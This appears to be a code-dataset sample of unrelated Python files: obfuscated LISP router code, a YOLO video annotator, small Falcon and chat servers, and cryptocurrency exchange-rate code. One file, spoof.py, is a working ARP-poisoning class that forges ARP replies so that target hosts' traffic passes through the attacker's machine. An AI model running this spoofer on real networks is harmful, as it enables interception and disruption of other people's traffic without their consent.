if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
# Configuration/command dispatch table for the lisp-itr process.
# Maps each config clause name to [handler, {keyword: [optional-flag,
# allowed-values-or-min/max ...]}].  (Machine-obfuscated source: the bare
# handler names -- O0O000oOo0O, ooo000oOO, oO0O, IIiiIiI1, I1i1iii, oo --
# are defined earlier in this file; presumably the xtr-parameter, map-
# resolver, database-mapping and "show" handlers.  TODO confirm.)
o0O0OOo0oO = {
    "lisp xtr-parameters": [O0O000oOo0O, {
        "rloc-probing": [True, "yes", "no"],
        "nonce-echoing": [True, "yes", "no"],
        "data-plane-security": [True, "yes", "no"],
        "data-plane-logging": [True, "yes", "no"],
        "frame-logging": [True, "yes", "no"],
        "flow-logging": [True, "yes", "no"],
        "nat-traversal": [True, "yes", "no"],
        "checkpoint-map-cache": [True, "yes", "no"],
        "ipc-data-plane": [True, "yes", "no"],
        "decentralized-push-xtr": [True, "yes", "no"],
        "decentralized-pull-xtr-modulus": [True, 1, 0xff],
        "decentralized-pull-xtr-dns-suffix": [True],
        "register-reachable-rtrs": [True, "yes", "no"],
        "program-hardware": [True, "yes", "no"]}],
    "lisp interface": [lispconfig.lisp_interface_command, {
        "interface-name": [True],
        "device": [True],
        "instance-id": [True, 0, 0xffffffff],
        "dynamic-eid": [True],
        "multi-tenant-eid": [True],
        "lisp-nat": [True, "yes", "no"],
        "dynamic-eid-device": [True],
        "dynamic-eid-timeout": [True, 0, 0xff]}],
    "lisp map-resolver": [ooo000oOO, {
        "mr-name": [True],
        "ms-name": [True],
        "dns-name": [True],
        "address": [True]}],
    "lisp database-mapping": [oO0O, {
        "prefix": [],
        "mr-name": [True],
        "ms-name": [True],
        "instance-id": [True, 0, 0xffffffff],
        "secondary-instance-id": [True, 0, 0xffffffff],
        "eid-prefix": [True],
        "group-prefix": [True],
        "dynamic-eid": [True, "yes", "no"],
        "signature-eid": [True, "yes", "no"],
        "rloc": [],
        "rloc-record-name": [True],
        "elp-name": [True],
        "geo-name": [True],
        "rle-name": [True],
        "json-name": [True],
        "address": [True],
        "interface": [True],
        "priority": [True, 0, 255],
        "weight": [True, 0, 100]}],
    "lisp map-cache": [lispconfig.lisp_map_cache_command, {
        "prefix": [],
        "instance-id": [True, 0, 0xffffffff],
        "eid-prefix": [True],
        "group-prefix": [True],
        "send-map-request": [True, "yes", "no"],
        "rloc": [],
        "rloc-record-name": [True],
        "rle-name": [True],
        "elp-name": [True],
        "address": [True],
        "priority": [True, 0, 255],
        "weight": [True, 0, 100]}],
    "lisp itr-map-cache": [lispconfig.lisp_map_cache_command, {
        "prefix": [],
        "instance-id": [True, 0, 0xffffffff],
        "eid-prefix": [True],
        "group-prefix": [True],
        "rloc": [],
        "rloc-record-name": [True],
        "rle-name": [True],
        "elp-name": [True],
        "address": [True],
        "priority": [True, 0, 255],
        "weight": [True, 0, 100]}],
    "lisp explicit-locator-path": [lispconfig.lisp_elp_command, {
        "elp-name": [False],
        "elp-node": [],
        "address": [True],
        "probe": [True, "yes", "no"],
        "strict": [True, "yes", "no"],
        "eid": [True, "yes", "no"]}],
    "lisp replication-list-entry": [lispconfig.lisp_rle_command, {
        "rle-name": [False],
        "rle-node": [],
        "address": [True],
        "level": [True, 0, 255]}],
    "lisp geo-coordinates": [lispconfig.lisp_geo_command, {
        "geo-name": [False],
        "geo-tag": [False]}],
    "show itr-map-cache": [IIiiIiI1, {}],
    "show itr-rloc-probing": [I1i1iii, {}],
    "show itr-keys": [oo, {}],
    "show itr-dynamic-eid": [lispconfig.lisp_show_dynamic_eid_command, {}]
}
if 42 - 42: II111iiii / O0 . iIii1I11I1II1 / O0 / OoO0O00 / OoooooooOO
if 62 - 62: O0 . Oo0Ooo
if 33 - 33: Oo0Ooo / iIii1I11I1II1 % i1IIi
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
# Main body of the lisp-itr process (machine-obfuscated source; only
# comments are added here).  Starts up, then multiplexes over its sockets
# with select(): the map-reply/control socket, the IPC/command socket,
# a second control socket, and the data-plane punt socket.
if (I111I1Iiii1i() == False):
    # Startup failed -- log, print the exit banner and abort.
    lisp.lprint("lisp_itr_startup() failed")
    lisp.lisp_print_banner("ITR abnormal exit")
    exit(1)
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
# Sockets watched by select() below.
O0oooOoO = [i111I, oO0oIIII, II1Ii1iI1i, Oo0oO0oo0oO00]
if 62 - 62: OOooOOo / II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
Iiii1Ii = True
# lisp_receive()/lisp_parse_packet() expect a socket triple.
ooOOo00oo0 = [i111I] * 3
IIIII1Ii = [II1Ii1iI1i] * 3
if 13 - 13: II111iiii
while (True):
    # Blocks until one of the sockets is readable; a select() error
    # (e.g. on shutdown) ends the loop.
    try: o0o000Oo, oO0o0O0o0OO00, i1i1iiIIiiiII = select.select(O0oooOoO, [], [])
    except: break
    if 23 - 23: OoO0O00 + i11iIiiIii
    if 20 - 20: I1ii11iIi11i
    if 3 - 3: OoO0O00 * i1IIi . I1IiiI . O0 - OoOoOO00
    if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
    # Punt-path packets from the external data plane.
    if (lisp.lisp_ipc_data_plane and Oo0oO0oo0oO00 in o0o000Oo):
        lisp.lisp_process_punt(Oo0oO0oo0oO00, II1iII1i,
            iiI1iIiI)
    if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
    if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
    if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
    if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
    if 64 - 64: I11i + OoO0O00
    # Control packets on the first socket; RLOC-probe replies are handled
    # via pcap elsewhere, so they are ignored here.
    if (i111I in o0o000Oo):
        Ii1I1, i1oOOoo0o0OOOO, i1IiII1III, Ii = lisp.lisp_receive(ooOOo00oo0[0],
            False)
        if (i1oOOoo0o0OOOO == ""): break
        if 44 - 44: I1IiiI % Ii1I * I1IiiI . Oo0Ooo + I1ii11iIi11i . OOooOOo
        if (lisp.lisp_is_rloc_probe_reply(Ii[0])):
            lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
            continue
        if 6 - 6: IiII * OoooooooOO + I1Ii111 / Ii1I
        lisp.lisp_parse_packet(ooOOo00oo0, Ii, i1oOOoo0o0OOOO, i1IiII1III)
    if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
    if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
    if 34 - 34: OoooooooOO / Oo0Ooo * i11iIiiIii . II111iiii . OoooooooOO
    if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
    if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
    # Control packets on the second socket; a true return value means a
    # Map-Reply changed state, so kick the RLOC-probe timer immediately.
    if (II1Ii1iI1i in o0o000Oo):
        Ii1I1, i1oOOoo0o0OOOO, i1IiII1III, Ii = lisp.lisp_receive(IIIII1Ii[0],
            False)
        if (i1oOOoo0o0OOOO == ""): break
        if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
        if (lisp.lisp_is_rloc_probe_reply(Ii[0])):
            lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
            continue
        if 98 - 98: oO0o . OoooooooOO
        Oo000 = lisp.lisp_parse_packet(IIIII1Ii, Ii, i1oOOoo0o0OOOO, i1IiII1III)
        if 97 - 97: O0 / OOooOOo + o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
        if 33 - 33: I11i % II111iiii + OoO0O00
        if 93 - 93: i1IIi . IiII / I1IiiI + IiII
        if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
        if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
        if (Oo000):
            i11i11II11i = [i111I, i111I]
            lisp.lisp_start_rloc_probe_timer(0, i11i11II11i)
    if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
    if 69 - 69: ooOoO0o % ooOoO0o
    if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
    if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
    if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
    if 56 - 56: iIii1I11I1II1 - i11iIiiIii * iII111i
    if 84 - 84: OOooOOo + Ii1I + o0oOOo0O0Ooo
    # IPC socket: commands from the CLI ("clear", "nonce%..." echo-nonce
    # IPC, config commands), API requests and data packets.
    if (oO0oIIII in o0o000Oo):
        Ii1I1, i1oOOoo0o0OOOO, i1IiII1III, Ii = lisp.lisp_receive(oO0oIIII, True)
        if 33 - 33: Ii1I
        if (i1oOOoo0o0OOOO == ""): break
        if 93 - 93: ooOoO0o
        if (Ii1I1 == "command"):
            if (Ii == "clear"):
                lisp.lisp_clear_map_cache()
                continue
            if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
            if (Ii.find("nonce%") != - 1):
                # Echo-nonce IPC -- handled by the function defined above.
                OOo00ooOoO0o(Ii)
                continue
            if 19 - 19: I1ii11iIi11i
            lispconfig.lisp_process_command(oO0oIIII, Ii1I1,
                Ii, "lisp-itr", [o0O0OOo0oO])
        elif (Ii1I1 == "api"):
            lisp.lisp_process_api("lisp-itr", oO0oIIII, Ii)
        elif (Ii1I1 == "data-packet"):
            IIIii(Ii, "ipc")
        else:
            if (lisp.lisp_is_rloc_probe_reply(Ii[0])):
                lisp.lprint("ITR ignoring RLOC-probe request, using pcap")
                continue
            if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
            lisp.lisp_parse_packet(II1iII1i, Ii, i1oOOoo0o0OOOO, i1IiII1III)
    if 66 - 66: O0
    if 52 - 52: OoO0O00 * OoooooooOO
    if 12 - 12: O0 + IiII * i1IIi . OoO0O00
    if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
    if 28 - 28: iIii1I11I1II1
# Orderly shutdown.
I1II()
lisp.lisp_print_banner("ITR normal exit")
exit(0)
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
main.py | import os
import sys
import struct
import subprocess
from multiprocessing import Process
import errno
import cv2
from boundbox import Box, wrap_box
# Default location of the TensorRT YOLOv3 detector binary (writer side of
# the FIFO that getBbox() reads).
_RUNYOLO_CMD = "/home/rbccps2080/projects/prajwal/test/TensorRT-Yolov3/build/runYolov3"


def setBbox(cmd=_RUNYOLO_CMD):
    """Launch the detector executable as a child process.

    The process is started with Popen and NOT waited on -- the caller
    (a multiprocessing.Process in __main__) owns its lifetime.

    :param cmd: path of the executable to run; defaults to the original
                hard-coded build location, so existing callers are unchanged.
    """
    subprocess.Popen(cmd)
def getBbox():
    """Read detection boxes from a named pipe and burn them into video frames.

    Pairs with setBbox(): the detector process writes, per frame, a 1-byte
    header (box count) followed by 24 bytes per box (5 ints + 1 float,
    native order -- see the "=iiiiif" struct format).  Each annotated frame
    is appended to outpy.avi.
    """
    path = "/tmp/fifopipe"
    # Create the FIFO if needed; only "already exists" is tolerated.
    try:
        os.mkfifo(path)
    except OSError as oe:
        if oe.errno != errno.EEXIST:
            raise
    # Blocks until the writer (the detector) opens the pipe.
    fifo = os.open(path, os.O_RDONLY)
    frame_number = 1
    while (True):
        # NOTE(review): the capture AND the writer are re-created on every
        # outer iteration, so outpy.avi is overwritten each pass -- confirm
        # this is intended.
        videocap = cv2.VideoCapture("latest.mp4")
        if (videocap.isOpened() == False):
            print("python side ::::::::: Error opening video stream or file")
        out = cv2.VideoWriter('outpy.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 20, (1280, 720))
        while (videocap.isOpened()):
            ret, frame = videocap.read()
            if ret == False:
                break
            # One header byte = number of boxes for this frame.
            try:
                head = os.read(fifo, 1)
                print("python side ::::::::: value of head in try :: ", head)
                # head = sys.stdin.read(1)
            except:
                # Bare except: any read error is treated as end-of-stream.
                print("python side ::::::::: some error :: end??")
                sys.exit(0)
            head = int.from_bytes(head, "big")
            print("python side ::::::::: header length(number of boxes): ", head)
            print("python side ::::::::: frame_number :::::::::::::: ", frame_number)
            frame_number += 1
            if head == 0:
                # No boxes: skip the frame entirely (it is NOT written out).
                print("python side ::::::::: data :::::::::::::: DATA IS EMPTY")
                continue
            # 24 bytes per box: 5 ints + 1 float (likely x/y/w/h/class + score
            # -- TODO confirm against the C++ writer).
            for i in range(head):
                data_byte = os.read(fifo, 24)
                print("python side :::::::::::: data_byte value :::::: ", data_byte)
                print("python side :::::::::::: data_byte value :::::: ",
                    len(data_byte))
                data = struct.unpack("=iiiiif", data_byte)
                print("python side ::::::::: data :::::::::::::: ", data)
                data = Box(data)
                frame = wrap_box(frame, data)
            out.write(frame)
        videocap.release()
        out.release()
if __name__ == "__main__":
    # Run the detector (FIFO writer) and the frame annotator (FIFO reader)
    # as two cooperating processes; the named pipe couples them.
    p1 = Process(target=setBbox)
    p2 = Process(target=getBbox)
    p1.start()
    p2.start()
    p1.join()
    p2.join()
|
server.py | import falcon
import multiprocessing
import pbc.game
from dotenv import load_dotenv
from pathlib import Path
class AnswerResource(object):
    """Trivial health-check style resource."""

    def on_get(self, req, res):
        """Respond to any GET with a static greeting."""
        res.body = 'Hello, world!'
        res.status = falcon.HTTP_200
class StartGameResource(object):
    """Kicks off a game run in a background process."""

    def on_get(self, req, res):
        """Spawn the game process and acknowledge immediately."""
        new_game = pbc.game.Game()
        multiprocessing.Process(target=new_game.run, args=()).start()
        res.status = falcon.HTTP_200
        res.body = 'Game started'
# WSGI application and routes.
app = falcon.API()
app.add_route('/answer', AnswerResource())
app.add_route('/start', StartGameResource())
# NOTE(review): .env is loaded AFTER the app and routes are built; any code
# above that reads environment variables at import time will not see these
# values -- confirm that only request-time code depends on them.
env_path = Path('.') / '.env'
load_dotenv(dotenv_path=env_path, verbose=True)
|
spoof.py | import time
import threading
from scapy.all import ARP, send # pylint: disable=no-name-in-module
from .host import Host
from evillimiter.common.globals import BROADCAST
class ARPSpoofer(object):
    """Continuously ARP-poisons a set of hosts so their traffic is routed
    through this machine instead of the real gateway.

    Hosts can be added/removed at runtime; a daemon thread re-sends the
    spoofed ARP replies every ``interval`` seconds until stop() is called.
    """

    def __init__(self, interface, gateway_ip, gateway_mac):
        self.interface = interface
        self.gateway_ip = gateway_ip
        self.gateway_mac = gateway_mac
        # interval in s spoofed ARP packets are sent to targets
        self.interval = 2
        self._hosts = set()
        self._hosts_lock = threading.Lock()
        self._running = False

    def add(self, host):
        """Start spoofing `host` on the next loop pass."""
        with self._hosts_lock:
            self._hosts.add(host)
            host.spoofed = True

    def remove(self, host):
        """Stop spoofing `host` and re-announce the true MAC addresses."""
        with self._hosts_lock:
            self._hosts.discard(host)
            self._restore(host)
            host.spoofed = False

    def start(self):
        """Launch the background spoofing loop as a daemon thread."""
        thread = threading.Thread(target=self._spoof, args=[], daemon=True)
        self._running = True
        thread.start()

    def stop(self):
        """Ask the spoofing loop to exit after its current pass."""
        self._running = False

    def _spoof(self):
        """Background loop: periodically poison every registered host."""
        while self._running:
            # Snapshot the host set so the lock is held only briefly.
            # (set.copy() is a *shallow* copy -- Host objects stay shared.)
            with self._hosts_lock:
                hosts = self._hosts.copy()
            for host in hosts:
                if not self._running:
                    return
                self._send_spoofed_packets(host)
            time.sleep(self.interval)

    def _send_spoofed_packets(self, host):
        """Tell the host we are the gateway and the gateway we are the host."""
        # 2 packets = 1 gateway packet, 1 host packet
        packets = [
            ARP(op=2, psrc=host.ip, pdst=self.gateway_ip, hwdst=self.gateway_mac),
            ARP(op=2, psrc=self.gateway_ip, pdst=host.ip, hwdst=host.mac)
        ]
        # Plain loop -- sending is a side effect, not a value computation.
        for packet in packets:
            send(packet, verbose=0, iface=self.interface)

    def _restore(self, host):
        """
        Remaps host and gateway to their actual addresses
        """
        # 2 packets = 1 gateway packet, 1 host packet; broadcast, repeated
        # 3 times so neighbours reliably re-learn the real mappings.
        packets = [
            ARP(op=2, psrc=host.ip, hwsrc=host.mac, pdst=self.gateway_ip, hwdst=BROADCAST),
            ARP(op=2, psrc=self.gateway_ip, hwsrc=self.gateway_mac, pdst=host.ip, hwdst=BROADCAST)
        ]
        for packet in packets:
            send(packet, verbose=0, iface=self.interface, count=3)
Server.py | import threading
import socket
HOST = ''    # empty string = bind on all interfaces
PORT = 9000
# Shared mutable state, accessed from every client-handler thread.
clients = set()  # connected client sockets
names = {}       # client ephemeral port -> display name
def sendMsg(msg):
    """Broadcast `msg` (str) to every connected client socket.

    Iterates over a snapshot of `clients` so that handler threads adding or
    removing sockets concurrently cannot trigger a "set changed size during
    iteration" RuntimeError here.
    """
    for clt in tuple(clients):
        if clt is not None:
            clt.sendall(msg.encode())
def handle(c, address):
    """Serve one chat client on socket `c` until it disconnects.

    Protocol: the first recv is the client's display name; every later
    recv is a chat line that is broadcast to all clients.

    Fixes over the original: recv() returns b'' (not None) when the peer
    closes, so the old ``data is None`` check never fired and the loop spun
    forever broadcasting empty messages; cleanup now also runs on a clean
    disconnect, not only when a send/recv raised.
    """
    name = c.recv(256)
    names[address[1]] = name.decode()
    c.sendall('Welcome to the server {username}'.format(username=names[address[1]]).encode())
    print('Client {username} Connected'.format(username=names[address[1]]))
    sendMsg('Client {username} Connected'.format(username=names[address[1]]))
    clients.add(c)
    try:
        while c is not None:
            data = c.recv(1024)
            if not data:
                # b'' => peer closed the connection cleanly.
                break
            msg = 'Client {username}: '.format(username=names[address[1]]) + data.decode()
            sendMsg(msg)
            print(msg)
    except OSError:
        # Socket error (reset, broken pipe, ...) -- treat as a disconnect.
        pass
    finally:
        print('Client {username} Disconnected'.format(username=names[address[1]]))
        clients.discard(c)
        sendMsg('Client {username} Disconnected'.format(username=names[address[1]]))
        del names[address[1]]
        c.close()
class Server(object):
    """Minimal TCP chat server: accepts connections forever and hands each
    one to the module-level `handle` function on its own thread."""

    def __init__(self, hostname, port):
        self.hostname = hostname
        self.port = port

    def start(self):
        """Bind, listen, and dispatch clients until interrupted."""
        self.socket = socket.socket()
        print(self.hostname)
        self.socket.bind((self.hostname, self.port))
        self.socket.listen(10)
        while True:
            # accept() returns (conn, address) -- exactly the two
            # positional arguments handle() expects.
            conn_info = self.socket.accept()
            threading.Thread(target=handle, args=conn_info).start()
if __name__ == '__main__':
    # Listen on all interfaces (HOST == '') at PORT 9000.
    server = Server(hostname=HOST, port=PORT)
    server.start()
|
exchange_rate.py | from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {}
'''
{'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
'''
class ExchangeBase(PrintError):
    """Abstract base class for fiat exchange-rate providers.

    Subclasses implement get_rates() (spot quotes) and optionally
    request_history()/history_ccys() for historical rates.  `on_quotes`
    and `on_history` are callbacks fired when fresh data is available.
    """

    def __init__(self, on_quotes, on_history):
        self.history = {}   # ccy -> {'YYYY-MM-DD': rate, ..., 'timestamp': ...}
        self.quotes = {}    # ccy -> spot rate
        self.on_quotes = on_quotes
        self.on_history = on_history

    def get_json(self, site, get_string):
        """GET https://<site><get_string> and return the parsed JSON body."""
        # APIs must have https
        url = ''.join(['https://', site, get_string])
        response = requests.request('GET', url, headers={'User-Agent': 'Electrum'}, timeout=10)
        return response.json()

    def get_csv(self, site, get_string):
        """GET https://<site><get_string> and return CSV rows as dicts."""
        url = ''.join(['https://', site, get_string])
        response = requests.request('GET', url, headers={'User-Agent': 'Electrum'})
        reader = csv.DictReader(response.content.decode().split('\n'))
        return list(reader)

    def name(self):
        """The exchange's name -- simply the subclass name."""
        return self.__class__.__name__

    def update_safe(self, ccy):
        """Fetch spot quotes for `ccy`; never raises (runs on a worker thread)."""
        try:
            self.print_error("getting fx quotes for", ccy)
            self.quotes = self.get_rates(ccy)
            self.print_error("received fx quotes")
        except BaseException as e:
            self.print_error("failed fx quotes:", e)
        self.on_quotes()

    def update(self, ccy):
        """Kick off an asynchronous quote refresh."""
        t = Thread(target=self.update_safe, args=(ccy,))
        t.daemon = True  # attribute form; setDaemon() is deprecated
        t.start()

    def read_historical_rates(self, ccy, cache_dir):
        """Load cached history for `ccy` from disk; return the dict or None."""
        filename = os.path.join(cache_dir, self.name() + '_' + ccy)
        h = None
        if os.path.exists(filename):
            timestamp = os.stat(filename).st_mtime
            try:
                with open(filename, 'r', encoding='utf-8') as f:
                    h = json.loads(f.read())
                h['timestamp'] = timestamp
            except Exception:
                # Unreadable or corrupt cache file -- treat as missing.
                # (Narrowed from a bare except, which also swallowed
                # KeyboardInterrupt/SystemExit.)
                h = None
        if h:
            self.history[ccy] = h
            self.on_history()
        return h

    def get_historical_rates_safe(self, ccy, cache_dir):
        """Fetch history for `ccy`, cache it to disk, and notify; never raises."""
        try:
            self.print_error("requesting fx history for", ccy)
            h = self.request_history(ccy)
            self.print_error("received fx history for", ccy)
        except BaseException as e:
            self.print_error("failed fx history:", e)
            return
        filename = os.path.join(cache_dir, self.name() + '_' + ccy)
        with open(filename, 'w', encoding='utf-8') as f:
            f.write(json.dumps(h))
        h['timestamp'] = time.time()
        self.history[ccy] = h
        self.on_history()

    def get_historical_rates(self, ccy, cache_dir):
        """Ensure history for `ccy` exists and is < 24h old, refreshing async."""
        if ccy not in self.history_ccys():
            return
        h = self.history.get(ccy)
        if h is None:
            h = self.read_historical_rates(ccy, cache_dir)
        if h is None or h['timestamp'] < time.time() - 24 * 3600:
            t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
            t.daemon = True
            t.start()

    def history_ccys(self):
        """Currencies with historical data; overridden by subclasses."""
        return []

    def historical_rate(self, ccy, d_t):
        """Rate for `ccy` on date `d_t`, or the string 'NaN' when unknown."""
        return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')

    def get_currencies(self):
        """Probe the exchange for its supported 3-letter currency codes."""
        rates = self.get_rates('')
        return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a) == 3])
class CoinMarketCap(ExchangeBase):
    """Spot rates from the CoinMarketCap v1 ticker (USD price only)."""

    def get_rates(self, ccy):
        # Bug fix: the original never interpolated `ccy`, so the literal
        # text "%s" was sent as the convert= query parameter.  Also renamed
        # the local so it no longer shadows the json module.
        ticker = self.get_json('api.coinmarketcap.com',
                               "/v1/ticker/primecoin?convert=%s" % ccy)
        return {'USD': Decimal(ticker[0]['price_usd'])}
def dictinvert(d):
    """Invert a dict-of-lists: map each value to the list of keys whose
    list contains it, preserving encounter order."""
    inverted = {}
    for key, values in d.items():
        for value in values:
            inverted.setdefault(value, []).append(key)
    return inverted
def get_exchanges_and_currencies():
    """Return {exchange_name: [currency codes]}, cached in currencies.json.

    If the cache file next to this module is readable, it is used as-is.
    Otherwise every ExchangeBase subclass in this module is probed over the
    network and the result is written back to the cache.  NOTE(review):
    this is called at import time (see CURRENCIES below), so a missing
    cache file triggers network I/O on import.
    """
    import os, json
    path = os.path.join(os.path.dirname(__file__), 'currencies.json')
    try:
        with open(path, 'r', encoding='utf-8') as f:
            return json.loads(f.read())
    except:
        # Bare except kept as-is: any failure falls through to a re-probe.
        pass
    d = {}
    # An "exchange" is any concrete ExchangeBase subclass in this module.
    is_exchange = lambda obj: (inspect.isclass(obj)
                               and issubclass(obj, ExchangeBase)
                               and obj != ExchangeBase)
    exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
    for name, klass in exchanges.items():
        exchange = klass(None, None)
        try:
            d[name] = exchange.get_currencies()
            print(name, "ok")
        except:
            print(name, "error")
            continue
    with open(path, 'w', encoding='utf-8') as f:
        f.write(json.dumps(d, indent=4, sort_keys=True))
    return d
# Built once at import time: {exchange_name: [supported currency codes]}.
# May hit the network if the currencies.json cache is missing (see above).
CURRENCIES = get_exchanges_and_currencies()


def get_exchanges_by_ccy(history=True):
    """Return {ccy: [exchange names]}.

    With history=True (the default) only history-capable currencies are
    considered, by instantiating each exchange class and asking it for
    history_ccys(); otherwise the full CURRENCIES table is inverted.
    """
    if not history:
        return dictinvert(CURRENCIES)
    d = {}
    exchanges = CURRENCIES.keys()
    for name in exchanges:
        # Exchange classes are looked up by name in this module's globals.
        klass = globals()[name]
        exchange = klass(None, None)
        d[name] = exchange.history_ccys()
    return dictinvert(d)
class FxThread(ThreadJob):
    # Periodic job (driven by the plugins thread) that keeps fiat exchange
    # rates fresh via self.exchange and exposes fiat formatting helpers.

    def __init__(self, config, network):
        self.config = config
        self.network = network
        self.ccy = self.get_currency()
        self.history_used_spot = False
        self.ccy_combo = None
        self.hist_checkbox = None
        self.cache_dir = os.path.join(config.path, 'cache')
        # set_exchange() zeroes self.timeout, forcing an immediate refresh
        # on the first run() pass.
        self.set_exchange(self.config_exchange())
        if not os.path.exists(self.cache_dir):
            os.mkdir(self.cache_dir)

    def get_currencies(self, h):
        d = get_exchanges_by_ccy(h)
        return sorted(d.keys())

    def get_exchanges_by_ccy(self, ccy, h):
        d = get_exchanges_by_ccy(h)
        return d.get(ccy, [])

    def ccy_amount_str(self, amount, commas):
        """Format a fiat amount using the currency's decimal precision."""
        prec = CCY_PRECISIONS.get(self.ccy, 2)
        fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
        try:
            rounded_amount = round(amount, prec)
        except decimal.InvalidOperation:
            # e.g. rounding a NaN Decimal -- format the raw value instead.
            rounded_amount = amount
        return fmt_str.format(rounded_amount)

    def run(self):
        # This runs from the plugins thread which catches exceptions
        if self.is_enabled():
            if self.timeout == 0 and self.show_history():
                self.exchange.get_historical_rates(self.ccy, self.cache_dir)
            if self.timeout <= time.time():
                # Refresh quotes roughly every 150 seconds.
                self.timeout = time.time() + 150
                self.exchange.update(self.ccy)

    # --- config accessors -------------------------------------------------

    def is_enabled(self):
        return bool(self.config.get('use_exchange_rate'))

    def set_enabled(self, b):
        return self.config.set_key('use_exchange_rate', bool(b))

    def get_history_config(self):
        return bool(self.config.get('history_rates'))

    def set_history_config(self, b):
        self.config.set_key('history_rates', bool(b))

    def get_history_capital_gains_config(self):
        return bool(self.config.get('history_rates_capital_gains', False))

    def set_history_capital_gains_config(self, b):
        self.config.set_key('history_rates_capital_gains', bool(b))

    def get_fiat_address_config(self):
        return bool(self.config.get('fiat_address'))

    def set_fiat_address_config(self, b):
        self.config.set_key('fiat_address', bool(b))

    def get_currency(self):
        '''Use when dynamic fetching is needed'''
        return self.config.get("currency", "EUR")

    def config_exchange(self):
        return self.config.get('use_exchange', 'BitcoinAverage')

    def show_history(self):
        return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()

    def set_currency(self, ccy):
        self.ccy = ccy
        self.config.set_key('currency', ccy, True)
        self.timeout = 0  # Because self.ccy changes
        self.on_quotes()

    def set_exchange(self, name):
        # Unknown exchange names fall back to CoinMarketCap.
        class_ = globals().get(name, CoinMarketCap)
        self.print_error("using exchange", name)
        if self.config_exchange() != name:
            self.config.set_key('use_exchange', name, True)
        self.exchange = class_(self.on_quotes, self.on_history)
        # A new exchange means new fx quotes, initially empty.  Force
        # a quote refresh
        self.timeout = 0
        self.exchange.read_historical_rates(self.ccy, self.cache_dir)

    def on_quotes(self):
        if self.network:
            self.network.trigger_callback('on_quotes')

    def on_history(self):
        if self.network:
            self.network.trigger_callback('on_history')

    # --- conversion / formatting helpers ----------------------------------

    def exchange_rate(self):
        '''Return the exchange rate as a Decimal (NaN when unavailable).'''
        rate = self.exchange.quotes.get(self.ccy)
        if rate is None:
            return Decimal('NaN')
        return Decimal(rate)

    def format_amount(self, btc_balance):
        rate = self.exchange_rate()
        return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)

    def format_amount_and_units(self, btc_balance):
        rate = self.exchange_rate()
        return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)

